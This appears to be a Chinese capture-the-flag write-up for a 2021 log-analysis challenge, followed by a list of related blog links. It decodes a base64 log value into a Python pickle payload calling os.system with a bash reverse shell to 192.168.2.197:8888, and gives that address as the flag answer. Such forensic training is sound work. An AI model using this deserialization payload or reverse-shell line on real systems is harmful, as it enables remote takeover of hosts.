[陇剑杯 2021]简单日志分析(问3)

1. 提取最后一条 base64

最后一条日志的 user 参数值为:

text

复制代码
STAKcDAKMFMnYmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIuMTk3Lzg4ODggMD4mMScKcDEKMChnMApscDIKMChJMAp0cDMKMChnMwpJMApkcDQKMGNvcwpzeXN0ZW0KcDUKMGc1CihnMQp0Ui4=

2. Base64 解码

python

复制代码
import base64

payload = "STAKcDAKMFMnYmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIuMTk3Lzg4ODggMD4mMScKcDEKMChnMApscDIKMChJMAp0cDMKMChnMwpJMApkcDQKMGNvcwpzeXN0ZW0KcDUKMGc1CihnMQp0Ui4="
decoded = base64.b64decode(payload)
print(decoded)

输出:

text

复制代码
b'I\x0c0\x0c0S\'bash -i >& /dev/tcp/192.168.2.197/8888 0>&1\'\nw1\n0(g0\nlp2\n0(I0\ntp3\n0(g3\nI0\ndp4\n0cos\nsystem\np5\n0g5\n(g1\ntR.'

可以看到里面明明白白地出现了:

text

复制代码
bash -i >& /dev/tcp/192.168.2.197/8888 0>&1

3. 结论

反弹 shell 的目标 IP 和端口是:

text

复制代码
192.168.2.197:8888

最终答案:

text

复制代码
192.168.2.197:8888
NSSCTF{192.168.2.197:8888}
相关推荐
望获linux7 分钟前
【Linux基础知识系列:第一百五十九篇】磁盘健康监测:smartctl
linux·前端·数据库·chrome·python·操作系统·软件
CoderJia程序员甲1 小时前
GitHub 热榜项目 - 日榜(2025-10-23)
ai·开源·大模型·github·ai教程
十一吖i1 小时前
vue3表格显示隐藏列全屏拖动功能
前端·javascript·vue.js
冰暮流星3 小时前
css之线性渐变
前端·css
徐同保3 小时前
tailwindcss暗色主题切换
开发语言·前端·javascript
mapbar_front3 小时前
大厂精英为何在中小公司水土不服?
前端
生莫甲鲁浪戴3 小时前
Android Studio新手开发第二十七天
前端·javascript·android studio
2501_916008895 小时前
Web 前端开发常用工具推荐与团队实践分享
android·前端·ios·小程序·uni-app·iphone·webview
Metaphor6926 小时前
Java 操作 PDF 图像:轻松驾驭 PDF 文档中的图片
经验分享
SkylerHu6 小时前
前端代码规范:husky+ lint-staged+pre-commit
前端·代码规范